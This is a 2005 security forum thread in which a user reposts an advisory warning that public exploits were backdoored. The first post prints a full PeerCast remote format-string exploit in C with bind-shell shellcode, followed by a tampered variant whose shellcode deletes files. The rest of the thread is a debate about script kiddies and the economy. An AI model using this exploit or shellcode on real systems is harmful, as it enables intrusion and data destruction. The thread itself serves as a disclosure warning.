• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

Exploits Backdoored!!!

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
elboth1
Just Arrived
Just Arrived


Joined: 27 Jul 2005
Posts: 0


Offline

PostPosted: Wed Jul 27, 2005 4:35 am    Post subject: Exploits Backdoored!!! Reply with quote

I just read this.. WTF!!!!!
__________________

It has come to our attention that a large amount of public
security exploits/software have been modified and re-posted
to legitimate trusted information sites for public downloads.

We have recently came across 5 exploits that have had a shellcode modification
after legit verification of trusted download sites.

The following information security sites have listed a number of modified exploits:

unl0ck security research
g0tfault security
m00 security

Unl0ck was recently broken into by a anti-security/hacker organization
named dikline (dikline.com ?) and ALL exploit sources were modified in different
ways to infect the host attempting to exploit them.

Numerous modified sources of "internal" / "0day" sources by a
security group named "m00 security" have also been reported as modified by
the dikline organization.

We have audited numerous public exploit code's and have come up with some interesting
results. The following is a clear example of modified shellcode to:

Original shellcode of the exploit "p33r-b33r.c" by unl0ck:


/*
\ PeerCast <= 0.1211 remote format string exploit
/ [<< Public Release >>]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
\
/ uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> Cool & 0xff; \
b3 = (addr ) & 0xff; \
}
//*******************************************

//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
//****************************************************************


//****************************
#define HOST "127.0.0.1"
#define PORT 7144
#define GOTADDR 0x0809da9c
#define SHELLADDR 0x49adb23c
//****************************



//***********************************************************************
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
char * buf;
unsigned char b0, b1, b2, b3;
int start = 256;

doit( b0, b1, b2, b3, retaddr );
buf = (char *)malloc(999);
memset( buf, 0, 999 );

b3 -= figure;
b2 -= figure;
b1 -= figure;
b0 -= figure;

snprintf( buf, 999,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - 16 + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );

return buf;
}
//*************************************************************************

//*************************************************************************
int
main( int argc, char * argv[] )
{
struct sockaddr_in addr;
int sock;
char * fmt;
char endian[31337], da_shell[31337];
unsigned long locaddr, retaddr;
unsigned int offset, base;
unsigned char b0, b1, b2, b3;

system("clear");
printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
printf("*^*^*^ by Darkeagle ^*^*^*\n");
printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");

memset( endian, 0x00, 31337 );
memset( da_shell, 0x00, 31337 );

addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(HOST);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

locaddr = GOTADDR;
retaddr = SHELLADDR;
offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

doit( b0, b1, b2, b3, locaddr );

base = 4;
printf("[*] Buildin' evil code\n");
strcat(endian, "GET /html/en/index.html");
snprintf( endian+strlen(endian), sizeof(endian),
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );

fmt = evil_builder( retaddr, offset, base, 0x10 );

memset(fmt+strlen(fmt), 0x55, 32);
strcat(fmt, shellcode);
strcat(endian, fmt);
strcat(endian, "\r\n\r\n\r\n");
printf("[+] Buildin' complete!\n");
sprintf(da_shell, "telnet %s 4444", HOST);

// just go, y0!
printf("[*] Connectin'\n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[-] Connection failed!\n\n");
exit(0); }

printf("[+] Connected!\n");
printf("[*] Sleepin'\n");
sleep(1);

printf("[*] Sendin'\n");
send(sock, endian, strlen(endian), 0);

printf("[*] Sleepin'\n");
sleep(1);

printf("[*] Connectin' in da shell\n\n");
sleep(1);
system(da_shell);
return 0;
}


----------- Replaced modified shellcode to rm-rf remote host:


/*
\ PeerCast <= 0.1211 remote format string exploit
/ [<< Public Release >>]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
\
/ uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> Cool & 0xff; \
b3 = (addr ) & 0xff; \
}
//*******************************************


//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
//****************************************************************


The above shellcode is a modified version that was found listed
on the unl0ck security website under downloads days before the
site went down.

We have audited and found differences in shellcode on the following code:

(POSSIBLY MANY MORE)

unrealmagic.c - shellcode modified to rm -rf /* host
p33r-b33r.c - shellcode modified to rm -rf /* host
0x666-ftpd.c - shellcode modified to rm -rf /* host
gotfault-htdead.c - shellcode modified to rm -rf /* host
gotfault-lcdproc.c - shellcode modified to install LKM
gotfault-newspost.c - shellcode modified to rm -rf /* host
gotfault-ngircd.c - shellcode modified to rm -rf /* host
gotfault-nwlpstat.c - shellcode modified to rm -rf /* host
gotfault-openftpd-msg.c - shellcode modified to install LKM
gotfault-pbs4q.c - shellcode modified to add password to mail users
gotfault-putty.c - shellcode modified to install LKM
gotfault-realmagicV2.c - shellcode modified to install LKM
gotfault-sing.sh - shellcode modified to install unknown backdoor.
gotfault-vmpsd.c - shellcode modified to rm -rf /* host
gotfault-zebedee.c - shellcode modified to rm -rf /* host
gotfault-zebedee-win32.zip - unknown
gotfault-exim.tar.gz - shellcode modified to rm -rf /* host
gotfault-3cdsmash.c - shellcode modified to install NEW LKM
gotfault-psoproxy.c - shellcode modified to install LKM
gotfault-pcwsd.c - shellcode modified to install LKM


This is an urgent notice to all of the security individuals who have downloaded
any of the above (and more) exploits. Please take note to your collections
we must find out what this dikline organization has backdoor'd and fix it!

*** MAKE SURE to check your shellcode whenever possible.


That is CRAZY! Guess imma have to check my code now DOH =(((
Back to top
View user's profile Send private message
Groovicus
Trusted SF Member
Trusted SF Member


Joined: 19 May 2004
Posts: 9
Location: Centerville, South Dakota

Offline

PostPosted: Wed Jul 27, 2005 5:12 am    Post subject: Reply with quote

Aww... exploits were backdoored? <insert sarcastic comment>

I guess my question would be "What do you expect"?..... No honor among thieves and whut..
Back to top
View user's profile Send private message Visit poster's website
AdamV
SF Mod
SF Mod


Joined: 06 Oct 2004
Posts: 24
Location: Leeds, UK

Offline

PostPosted: Wed Jul 27, 2005 10:16 am    Post subject: Reply with quote

Wouldn't this story be great propaganda even if it is not true!

"Waiting for Gullible", a short film.

Official government person: "we can't stop these damn script kiddies and they're harming our economy"
Bright ideas man: "why don't we hack the crackers and break their shellcode?"
OGP: "Human rights, freedom of speech, computer misues - all our own laws prevent us from doing that"
Idea BIM: "What if we just said we did it?"
OGP: "Dear Press Release..."
...
skrypt kyddz: "Oh no, I'm too lame to be able to work out if my sploit is hacked, so I daren't use it!"
...
World:" ouch, my bleeding heart (and aching sides from ROFLMAO)"

-Fin-
Back to top
View user's profile Send private message Visit poster's website
bsdevious
Just Arrived
Just Arrived


Joined: 27 Oct 2004
Posts: 0


Offline

PostPosted: Sun Aug 07, 2005 10:58 pm    Post subject: Reply with quote

Script kids more so help the economy than harm it. Most of the lame whitehat industry depends on them keeping them in jobs.

Don't get me wrong, I'm not into ./hacking servers, I just see it from that stand point.
Back to top
View user's profile Send private message
Groovicus
Trusted SF Member
Trusted SF Member


Joined: 19 May 2004
Posts: 9
Location: Centerville, South Dakota

Offline

PostPosted: Sun Aug 07, 2005 11:01 pm    Post subject: Reply with quote

ScriptKiddeis don't contribute anything. They're not the ones with the talent.
Back to top
View user's profile Send private message Visit poster's website
bsdevious
Just Arrived
Just Arrived


Joined: 27 Oct 2004
Posts: 0


Offline

PostPosted: Sun Aug 07, 2005 11:13 pm    Post subject: Reply with quote

groovicus wrote:
ScriptKiddeis don't contribute anything. They're not the ones with the talent.


Now that statement doesn't make any sense. How do those 2 factors retort my statement above ?
Back to top
View user's profile Send private message
Groovicus
Trusted SF Member
Trusted SF Member


Joined: 19 May 2004
Posts: 9
Location: Centerville, South Dakota

Offline

PostPosted: Mon Aug 08, 2005 12:23 am    Post subject: Reply with quote

Script Kiddies help the economy how? That's analagous to saying that shoplifters help the economy because more security guards then have jobs. Contributing implies that something is gained, when in reality, Script Kiddie activity only hurts the economy by causing increased expense for everybody. When a vendor has to sink millions into a product to ensure that Skiddies can't have their way with the product, the cost is then passed on to the consumer. If I have less money (along with billions of other consumers) to spend on other consumables, then the economy as a whole suffers.

Business have to hire more security personnel, which in turn increases overhead, which again is passed on to the consumer. The consumer has less money to spend, and again the economy suffers.

Lost productivity also has a negative influence on the economy.

Script Kiddies have no talent..they are mere sheep. The ones that contribute are the ones that discover the vulnerabilities in the first place.
Back to top
View user's profile Send private message Visit poster's website
capi
SF Senior Mod
SF Senior Mod


Joined: 21 Sep 2003
Posts: 16777097
Location: Portugal

Offline

PostPosted: Mon Aug 08, 2005 12:48 am    Post subject: Reply with quote

Money doesn't just disappear into the void, you know - money that A spends is money that B earns Wink
Back to top
View user's profile Send private message
Groovicus
Trusted SF Member
Trusted SF Member


Joined: 19 May 2004
Posts: 9
Location: Centerville, South Dakota

Offline

PostPosted: Mon Aug 08, 2005 1:39 am    Post subject: Reply with quote

Which would be just fine if everybody was involved in some aspect of computers/software as anything other than a consumer, then the money would be equitably distributed. I have to pay my ISP more, because they have to increase their security, purchase better filtering software, and pay more techs. Granted, there are other factors that contribute to overhead, but it still plays a part.

I pay more at stores because those that own the stores have to absorb losses, and it only makes sense to pass it on to the consumer. Wal-Mart might have cool stuff, but I have not got a check from them recently. I pay more for insurance because insurance fraud costs billions of dollars in losses Those that own the businesses don't absorb it, the consumer does.

And since losses contribute to necessary expenses (food, insurance, shelter, etc), I am forced to spend more money. Of that money, an extra $50 per month would grow nicely if put to work for me.

Just for the sake of argument, if on average I eat $2000 worth of food every year, and me being an average person, am comparable with all others (age not withstanding). In the United States alone, the 2000 Census estimates the population to be around 290 million. If we could decrease shoplifitng and fraud enough to decrease food costs by an arbitrary $5 per year, the economy would have an extra, what, billion and a half of discretionary income...

If we could somehow save $5 per person when it comes to insurance, health care, and housing, the amount of available discretionary income becomes staggering. It adds up.

All of which is irrelevant, because I still don't agree that Script Kiddies contribute anything, any more than Syphillis contributes to the penicillin industry.

Quote:
Money doesn't just disappear into the void, you know


It does at bill time at my house.
Back to top
View user's profile Send private message Visit poster's website
alt.don
SF Boss
SF Boss


Joined: 04 Mar 2003
Posts: 16777079


Offline

PostPosted: Mon Aug 08, 2005 1:49 am    Post subject: Reply with quote

Hey Groovicus,

I agree with you wholeheartedly. Though very few see it that way as evidenced by the various opinions in this thread. Vive la difference!
Back to top
View user's profile Send private message Visit poster's website
capi
SF Senior Mod
SF Senior Mod


Joined: 21 Sep 2003
Posts: 16777097
Location: Portugal

Offline

PostPosted: Mon Aug 08, 2005 5:00 pm    Post subject: Reply with quote

groovicus wrote:
All of which is irrelevant, because I still don't agree that Script Kiddies contribute anything, any more than Syphillis contributes to the penicillin industry.

Ah, but there lies the point. Without the need there would be no product; without diseases there would be no medicine, no multi-billion-dolar pharmaceutical industries, etc.

While obviously not being a good thing per se, you cannot argue the fact that disease does contribute in a major way to a huge industry. Likewise for security threats all around (IT, privacy, physical, etc) - without them, there would be no need for security companies and products. In effect, there would be no need for most of the people that post in this forum.

Goods and services here, like anywhere else. Jobs for people, taxes for the state; in general, cash is flowing. As I said in my previous post, money you spend is money someone else earns, regardless of the final distribution of the money.

In a capitalist, or near-capitalist, society, the security industry is no different from an economic standpoint than the food industry, the medicine industry, or the entertainment industry: a few people get richer, a lot of people get poorer - no news there.
Back to top
View user's profile Send private message
AdamV
SF Mod
SF Mod


Joined: 06 Oct 2004
Posts: 24
Location: Leeds, UK

Offline

PostPosted: Mon Aug 08, 2005 5:12 pm    Post subject: Reply with quote

I think the point here is that without syphilis we would still use penicillin to deal with other infections, just as we would need tools to deal with crackers and black hats even if there were no skript kidz spreading problems more widely but with no real skills
Back to top
View user's profile Send private message Visit poster's website
comrade
Just Arrived
Just Arrived


Joined: 15 Feb 2005
Posts: 0


Offline

PostPosted: Tue Aug 09, 2005 5:38 am    Post subject: Reply with quote

You have a problem. A industry develops to solve that problem.

If there were no illness's then the medical profession wouldn't exist, there would be a couple of million less people employed in that particular field.
But thats a good thing, those people would then be able to contribute in other fields, such as research/engineering. In the end we would have all that time and resources being used elsewhere - we'd have more resources on the whole for important things, like eliminating dialup Smile.

I if given the chance would op for no problem in the first place and therefore no millions of jobs revolving around solving that problem then waste resources on it when we could be further advancing humanity.

Justify the existance of a problem by saying "hey look we can employ people to solve it" seems odd to me.
Back to top
View user's profile Send private message
ToxicAsp
Just Arrived
Just Arrived


Joined: 07 Sep 2005
Posts: 0
Location: Around the world!

Offline

PostPosted: Wed Sep 07, 2005 6:42 pm    Post subject: Reply with quote

i agree with capi.... SK get us the job.. same as white / black hatz.. thnx to god there r still ppl out there trying to get into the nets.. else.. where would Security Techs be ?
Back to top
View user's profile Send private message
AdamV
SF Mod
SF Mod


Joined: 06 Oct 2004
Posts: 24
Location: Leeds, UK

Offline

PostPosted: Wed Sep 07, 2005 8:28 pm    Post subject: Reply with quote

at home with their families where they should be more often!
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register